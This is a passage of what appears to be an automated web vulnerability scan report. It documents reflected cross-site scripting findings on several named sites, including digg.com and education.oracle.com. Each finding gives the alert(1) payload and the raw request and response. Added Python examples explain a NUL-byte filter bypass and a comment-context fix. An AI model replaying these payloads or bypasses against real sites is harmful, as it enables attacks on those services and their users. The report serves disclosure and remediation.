Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=10601 t=1315321012024997
X-Served-By: logger-b011.krxd.net
Content-Length: 91
Date: Tue, 06 Sep 2011 14:56:52 GMT
Connection: close

{"error": "Non existant site for NBCU - cnbc.comb16f3<script>alert(1)</script>76bb110beda"}

3.27. http://content.plymedia.com/initialize [video parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /initialize

Issue detail

The value of the video request parameter is copied into an XML comment. The payload cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 was submitted in the video parameter. This input was echoed as cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /initialize?video=cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:15:32 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:32 GMT
Content-Length: 599
Connection: keep-alive

<!--9/6/2011 4:14:32 PM [Cached For:60, From: http://services.plymedia.com/initialize?video=cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222]--><!--9/6/2011
...[SNIP]...

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdf7'-alert(1)-'8a1211d7b4b was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Expires: Tue, 06 Sep 2011 15:22:56 GMT
Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b">
...[SNIP]...

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v11-001/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aa06'-alert(1)-'af6ec576df9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9">
...[SNIP]...

3.30. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003355b"><script>alert(1)</script>0a3916a9e29 was submitted in the REST URL parameter 1. This input was echoed as 3355b"><script>alert(1)</script>0a3916a9e29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
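
The mechanism described above can be reproduced offline. The following is an added example, not the scanner's code and not code from digg.com or any WAF vendor: BLOCKED is a constructed block-list standing in for whatever the real filter checks, and the request path is the one from the report. ctypes.c_char_p reads a byte string the way C does, stopping at the first NUL, so the "native filter" model sees only /submit while a length-aware check over the same bytes still finds the blocked token.

```python
"""NUL-byte bypass behind finding 3.30 (an added example; not the scanner's
code, and not digg.com's or any WAF vendor's code). BLOCKED is a constructed
block-list standing in for whatever the real filter checks; RAW_PATH is the
request path from the report."""
import ctypes
from urllib.parse import unquote_to_bytes

BLOCKED = (b"<script", b"javascript:", b"onerror=")                  # constructed block-list
RAW_PATH = '/submit%003355b"><script>alert(1)</script>0a3916a9e29'  # from the report


def c_string_view(data: bytes) -> bytes:
    """What a strstr()/strcasestr()-style check sees: the bytes up to the
    first NUL, because C strings are NUL-terminated."""
    return ctypes.c_char_p(data).value


def native_filter_blocks(data: bytes) -> bool:
    """Model of a block-list filter written in native code."""
    view = c_string_view(data).lower()
    return any(token in view for token in BLOCKED)


def length_aware_filter_blocks(data: bytes) -> bool:
    """The same block-list over the full byte string, as the application
    itself (and any length-aware filter) handles it."""
    return any(token in data.lower() for token in BLOCKED)


def bypasses_native_filter(path: str) -> bool:
    """True when the decoded path carries a blocked token that the native
    filter cannot see: the %00 bypass the report describes."""
    decoded = unquote_to_bytes(path)
    return not native_filter_blocks(decoded) and length_aware_filter_blocks(decoded)


def contains_nul(path: str) -> bool:
    """The cheap defence in front of either filter: a NUL byte has no
    legitimate place in a URL path or parameter, so refuse it outright."""
    return b"\x00" in unquote_to_bytes(path)


if __name__ == "__main__":
    print("native filter sees:", c_string_view(unquote_to_bytes(RAW_PATH)))
    print("bypass:", bypasses_native_filter(RAW_PATH), " contains NUL:", contains_nul(RAW_PATH))
```

Rejecting requests that decode to a NUL byte closes this particular bypass, but it does not fix the finding: the output encoding in the application is still missing, and the same filter can be bypassed by any other encoding difference between it and the application.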

Request

GET /submit%003355b"><script>alert(1)</script>0a3916a9e29 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19408553 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14406

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003355b"><script>alert(1)</script>0a3916a9e29.rss">
...[SNIP]...

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The value of the dc request parameter is copied into an HTML comment. The payload 2e67c--><a%20b%3dc>c97d7ad58db was submitted in the dc parameter. This input was echoed as 2e67c--><a b=c>c97d7ad58db in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
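
The comment-context problem in 3.27 (XML comment, namespace trick) and 3.31 (HTML comment) can be checked with the standard-library parsers. This is an added example, not the scanner's code and not code from either site. Both documents are constructed stand-ins: the real plymedia response has the comment at the top level, here it sits inside a <response> root so the result stays parseable, and the Oracle page is reduced to its diagnostic comment; the payloads are the ones from the report. The point it shows is that the injected value closes the comment, so for the XML case an XHTML-namespaced body element with an onload attribute appears in the parsed tree, and for the HTML case an <a> start tag appears; collapsing dash runs and encoding > keeps both inside the comment.

```python
"""Comment-context check for findings 3.27 (XML comment, namespace trick) and
3.31 (HTML comment). An added example, not the scanner's code or the sites'
code. The two documents below are constructed stand-ins; the payloads are the
ones from the report."""
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

XHTML = "http://www.w3.org/1999/xhtml"
XML_PAYLOAD = "cafa3--><a xmlns:a='%s'><a:body onload='alert(1)'/></a>94f14959222" % XHTML
HTML_PAYLOAD = "2e67c--><a b=c>c97d7ad58db"


def neutralize_for_comment(value: str) -> str:
    """Make a value safe inside <!-- ... -->: no '--' can remain (dash runs are
    collapsed, edge dashes dropped so they cannot join the delimiters) and no
    '>' (covers HTML's '--!>' and the abrupt '<!-->' / '<!--->' closes).
    Entities are not decoded inside comments, so '&gt;' stays literal."""
    value = re.sub(r"-+", "-", value).strip("-")
    return value.replace(">", "&gt;")


def render_xml(video: str) -> str:
    """Constructed stand-in for the /initialize response's cache note."""
    return "<response><!--Cached For:60, From: /initialize?video=%s--></response>" % video


def xhtml_event_handlers(xml_text: str):
    """Elements in the XHTML namespace that carry on* attributes: the part of
    the document a browser applying the namespace trick would execute."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.startswith("{%s}" % XHTML):
            handlers = {k: v for k, v in el.attrib.items() if k.startswith("on")}
            if handlers:
                found.append((el.tag, handlers))
    return found


def element_count(xml_text: str) -> int:
    """Elements below the root after parsing. Comments are dropped, so a value
    that stayed inside its comment contributes nothing."""
    return sum(1 for _ in ET.fromstring(xml_text).iter()) - 1


def render_html(course_id: str) -> str:
    """Constructed stand-in for the Oracle page's diagnostic comment."""
    return "<html><body><!-- No course found for id %s --><p>x</p></body></html>" % course_id


class StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def html_tags(markup: str):
    """Start tags the HTML tokenizer produces; a tag is only 'inside the
    comment' if the tokenizer never sees it."""
    parser = StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    print("XML handlers :", xhtml_event_handlers(render_xml(XML_PAYLOAD)))
    print("XML fixed    :", xhtml_event_handlers(render_xml(neutralize_for_comment(XML_PAYLOAD))))
    print("HTML tags    :", html_tags(render_html(HTML_PAYLOAD)))
    print("HTML fixed   :", html_tags(render_html(neutralize_for_comment(HTML_PAYLOAD))))
```

neutralize_for_comment is a last resort for values that must appear in a comment; the better remediation, as the report says, is not to echo user-controllable data into comments at all, since diagnostic comments like these serve no purpose in a production response.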

Request

GET /pls/web_prod-plq-dad/db_pages.getCourseDesc?dc=D70302_13531452e67c--><a%20b%3dc>c97d7ad58db HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819943764065,1)
Content-Length: 3769
Date: Tue, 06 Sep 2011 15:55:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<!-- No course found for id D70302_13531452e67c--><a b=c>c97d7ad58db -->
...[SNIP]...

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56fe7"%3balert(1)//452b678fc04 was submitted in the p_lang parameter. This input was echoed as 56fe7";alert(1)//452b678fc04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=&p_org_id=&p_lang=56fe7"%3balert(1)//452b678fc04 HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057828533965601,0)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7";alert(1)//452b678fc04&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&cust_region=&cust_
...[SNIP]...

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_wddi_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d8a"%3balert(1)//25f551d98f2 was submitted in the p_wddi_id parameter. This input was echoed as e4d8a";alert(1)//25f551d98f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=e4d8a"%3balert(1)//25f551d98f2&p_org_id=&p_lang= HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057875778605369,1)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=e4d8a";alert(1)//25f551d98f2&p_org_id=&p_lang=&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&
...[SNIP]...

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ec"><script>alert(1)</script>4d22a5b224d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=USd40ec"><script>alert(1)</script>4d22a5b224d HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057776994499472,1)
Content-Length: 950
Date: Tue, 06 Sep 2011 16:01:50 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
USd40ec"><script>alert(1)</script>4d22a5b224d
_rd_temp_config.js">
...[SNIP]...

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4202e"%3balert(1)//231562bd186 was submitted in the lang parameter. This input was echoed as 4202e";alert(1)//231562bd186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=US4202e"%3balert(1)//231562bd186 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057768404565213,0)
Content-Length: 920
Date: Tue, 06 Sep 2011 16:01:51 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "US4202e";alert(1)//231562bd186"</SCRIPT>
...[SNIP]...

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/show_desc.redirect

Issue detail

The value of the p_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6e2"><script>alert(1)</script>818bc7ecf2f was submitted in the p_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2"><script>alert(1)</script>818bc7ecf2f HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057845713838882,1)
Content-Length: 1022
Date: Tue, 06 Sep 2011 15:59:36 GMT

<HTML>
<HEAD>
<TITLE>Catalog Search Results</TITLE>
<SCRIPT language=JavaScript>document.domain="oracle.com"</SCRIPT>
<SCRIPT language=JavaScript>var site_section = "Search"</SCRIPT>
<script language=
...[SNIP]...
<FRAME SRC="
/pls/web_prod-plq-dad
/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2"><script>alert(1)</script>818bc7ecf2f
" NAME="content" MARGINWIDTH=5 MARGINHEIGHT=0 SCROLLING=AUTO>
...[SNIP]...

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f6e"><script>alert(1)</script>33d02dcf400 was submitted in the p_lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e262f6e"><script>alert(1)</script>33d02dcf400 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 19101
Content-Type: text/html; charset=UTF-8
